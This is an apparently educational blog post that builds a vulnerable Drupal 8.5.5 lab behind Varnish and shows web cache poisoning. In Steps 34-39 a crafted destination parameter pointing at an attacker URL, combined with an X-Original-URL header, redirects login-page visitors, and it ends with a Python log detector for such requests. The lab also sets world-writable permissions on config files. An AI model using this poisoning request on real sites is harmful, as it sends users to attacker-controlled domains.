Drupal 8 Web Cache Poisoning - Vulnerability Analysis
In this blog, I walk through all the steps to build a vulnerable lab for Drupal 8 web cache poisoning and show how the setup is vulnerable to both internal (Drupal page cache) and external (Varnish) cache poisoning.
Step 1: Download the supported version of xampp.
https://sourceforge.net/projects/xampp/files/XAMPP%20Linux/7.2.34/

Step 2: To install xampp, run the following command and follow the instructions on the installer and complete the installation using default installer options.
chmod +x xampp-linux-x64-7.2.34-2-installer.run
sudo ./xampp-linux-x64-7.2.34-2-installer.run

Step 3: Start all services.

Step 4: Navigate to “localhost/phpmyadmin” in the browser and click the “New” link to create a new database for the Drupal instance.

Step 5: Configure the password for the database (it is not mandatory, but I always recommend setting a strong database password rather than leaving it empty).

Step 6: Set the same password in the phpMyAdmin configuration file.
- sudo gedit /opt/lampp/phpmyadmin/config.inc.php
- Edit the value of $cfg['Servers'][$i]['password']

Step 7: Download the vulnerable version of Drupal 8.
wget https://ftp.drupal.org/files/projects/drupal-8.5.5.zip

Step 8: Unzip the Drupal 8 source into the XAMPP htdocs directory.
sudo unzip drupal-8.5.5.zip -d /opt/lampp/htdocs

Step 9: Navigate to http://localhost/drupal-8.5.5, which redirects to http://localhost/drupal-8.5.5/core/install.php to start the installation.

Step 10: Select an installation profile: choose “Standard” and click the “Save and continue” button.

Step 11: Because of the permissions on the Drupal installation directory, the installer shows an error message as shown below.

Step 12: Set the permissions to complete the installation of drupal.
cd /opt/lampp/htdocs/drupal-8.5.5
sudo mkdir sites/default/files
sudo chmod 777 sites/default/files/
sudo cp sites/default/default.settings.php sites/default/settings.php
sudo chmod 777 sites/default/settings.php

Step 13: Refresh the page from Step 11, scroll to the bottom of the page and click the “continue anyway” link as shown below:

Step 14: Provide the database name created for Drupal and the MySQL credentials.

Step 15: Observe that the installation is in progress.

Step 16: Configure the site settings for Drupal; the installer suggests resetting the permissions.

Step 17: Once done, you are logged in to the Drupal instance, and it again suggests resetting the permissions.

Step 18: Reset the permissions using the following commands.
sudo chmod 755 /opt/lampp/htdocs/drupal-8.5.5/sites/default/ -R
sudo chmod 755 /opt/lampp/htdocs/drupal-8.5.5/sites/default/settings.php
sudo chmod 755 sites/default/ -R
sudo chmod 755 sites/default/settings.php

Step 19: Configure the internal Drupal cache by navigating to the following URL and selecting the settings shown below.
http://localhost/drupal-8.5.5/admin/config/development/performance
Note: If the page gives a 404, check these Apache settings (reference):
sudo nano /etc/apache2/apache2.conf
<Directory /var/www/html/>
AllowOverride All
</Directory>
sudo a2enmod rewrite

Step 20: To configure Varnish as an external cache for Drupal, we first have to install two Drupal modules.
- Install purge_purger_http
wget https://ftp.drupal.org/files/projects/purge_purger_http-8.x-1.0-beta4.zip
sudo unzip purge_purger_http-8.x-1.0-beta4.zip -d /opt/lampp/htdocs/drupal-8.5.5/core/modules/

Step 21: Install purge.
wget https://ftp.drupal.org/files/projects/purge-8.x-3.0-beta5.zip
sudo unzip purge-8.x-3.0-beta5.zip -d /opt/lampp/htdocs/drupal-8.5.5/core/modules

Step 22: Navigate to http://localhost/drupal-8.5.5/admin/modules and enable the following modules.

Step 23: All the required modules are installed successfully.

Step 24: Navigate to http://localhost/drupal-8.5.5/admin/config/development/performance/purge and click the “Add purger” button.

Step 25: Select the “HTTP Purger” radio button and click the “Add” button.

Step 26: From the drop-down, select the “Configure” option.

Step 27: Provide the required information and click the “Save configuration” button.

Step 28: Navigate to “Headers”, provide the following header information and click the “Save configuration” button.
Header: Purge-Cache-Tags
Value: [invalidation:expression]

Step 29: Install and configure varnish.
sudo apt-get update && sudo apt-get install varnish
sudo cp /lib/systemd/system/varnish.service /etc/systemd/system/

Step 30: Configure Varnish to listen on port 80 in its service file.
sudo gedit /etc/systemd/system/varnish.service
sudo systemctl daemon-reload

Step 31: Change the Apache port from 80 to 8080.
sudo gedit /opt/lampp/etc/httpd.conf
Note: Point the Varnish backend at this port in /etc/varnish/default.vcl

Step 32: Map the port.
sudo gedit /opt/lampp/lampp

Step 33: Reload everything.
sudo /opt/lampp/lampp restart
sudo service varnish restart

Step 34: Capture one of the GET requests and add the following query parameter and request header.
//?destination=https://attackerurl\@websiteurl.com
X-Original-URL: //?caching=123

Step 35: Create the cache entry in the external Varnish cache and the internal Drupal 8 cache, and inspect both with the following (Varnish access log and the cache_page table in phpMyAdmin).
sudo varnishncsa -F '%U%q %{Varnish:hitmiss}x'
http://localhost/phpmyadmin/sql.php?server=1&db=drupal&table=cache_page&pos=0

Step 36: Update the url of Step 34 to “/drupal-8.5.5/user/login”.

Step 37: Observe that Varnish creates a new entry for “/drupal-8.5.5/user/login”, but when the request is forwarded to the internal cache, Drupal responds with the content it cached under “//?caching=123:html”.

Step 38: Now, if any user tries to access “/drupal-8.5.5/user/login”, they will be redirected to the attacker-controlled domain.

Step 39: Final cached entries after a user tries to access “/drupal-8.5.5/user/login”.
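Steps 34 to 39 together show a cache-key mismatch: Varnish keys the entry on the request URL, while Drupal's internal page cache honours the X-Original-URL override, so a poisoned internal entry is served under an unrelated Varnish key. As an added example (not code from the original post), here is a small Python detector for the Varnish access log that flags the two ingredients on the defender's side: path-override request headers and an off-site `destination` value. It assumes varnishncsa is run with an extended format, given in the comment, that adds the two headers to the page's own '%U%q %{Varnish:hitmiss}x' format; the log lines are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumed varnishncsa format (extends the page's '%U%q %{Varnish:hitmiss}x'):
#   varnishncsa -F '%h %U%q %{Varnish:hitmiss}x "%{X-Original-URL}i" "%{X-Rewrite-URL}i"'
# varnishncsa prints "-" for a header that is absent from the request.
LINE_RE = re.compile(r'^(\S+) (\S+) (hit|miss|pass|pipe|-) "([^"]*)" "([^"]*)"$')

# Constructed sample log: a normal login, the poisoning request from Step 34,
# and the later victim-style request that Varnish caches under the clean key.
SAMPLE_LOG = """\
10.0.0.5 /drupal-8.5.5/user/login?destination=/drupal-8.5.5/user hit "-" "-"
10.0.0.9 //?destination=https://attackerurl\\@websiteurl.com miss "//?caching=123" "-"
10.0.0.9 /drupal-8.5.5/user/login miss "-" "-"
"""

def is_safe_destination(value):
    """Accept only a same-site relative path. Rejects a scheme or authority
    ('https://...', '//host'), a backslash (browsers treat '\\' as '/', so
    'https://attackerurl\\@websiteurl.com' lands on attackerurl) and '@'."""
    if not value or not value.startswith("/") or value.startswith("//"):
        return False
    return "\\" not in value and "@" not in value

def analyse_line(line):
    """Parse one log line; return a record with a (possibly empty) findings list."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, url, state, x_orig, x_rewrite = m.groups()
    findings = []
    for name, val in (("X-Original-URL", x_orig), ("X-Rewrite-URL", x_rewrite)):
        if val != "-":
            findings.append(f"path override header {name}={val!r}")
    if url.startswith("//"):
        findings.append("protocol-relative request path")
    for dest in parse_qs(urlsplit(url).query).get("destination", []):
        if not is_safe_destination(dest):
            findings.append(f"off-site destination {dest!r}")
    return {"client": client, "url": url, "cache": state, "findings": findings}

def scan(log_text):
    """Return only the parsed records that produced at least one finding."""
    records = (analyse_line(l) for l in log_text.splitlines())
    return [r for r in records if r and r["findings"]]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert["client"], alert["url"], alert["cache"], "; ".join(alert["findings"]))
```

A `destination` check like `is_safe_destination` is also what the application side should apply before issuing the redirect, independently of the cache layer.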

References
- https://blog.lbherrera.me/posts/appcache-forgotten-tales/
- https://www.usenix.org/system/files/sec22summer_mirheidari.pdf
- https://youst.in/posts/cache-poisoning-at-scale/
- https://hackerone.com/reports/1160407
- https://hackerone.com/reports/1181946
- https://hackerone.com/reports/1173153
- https://hackerone.com/reports/1219038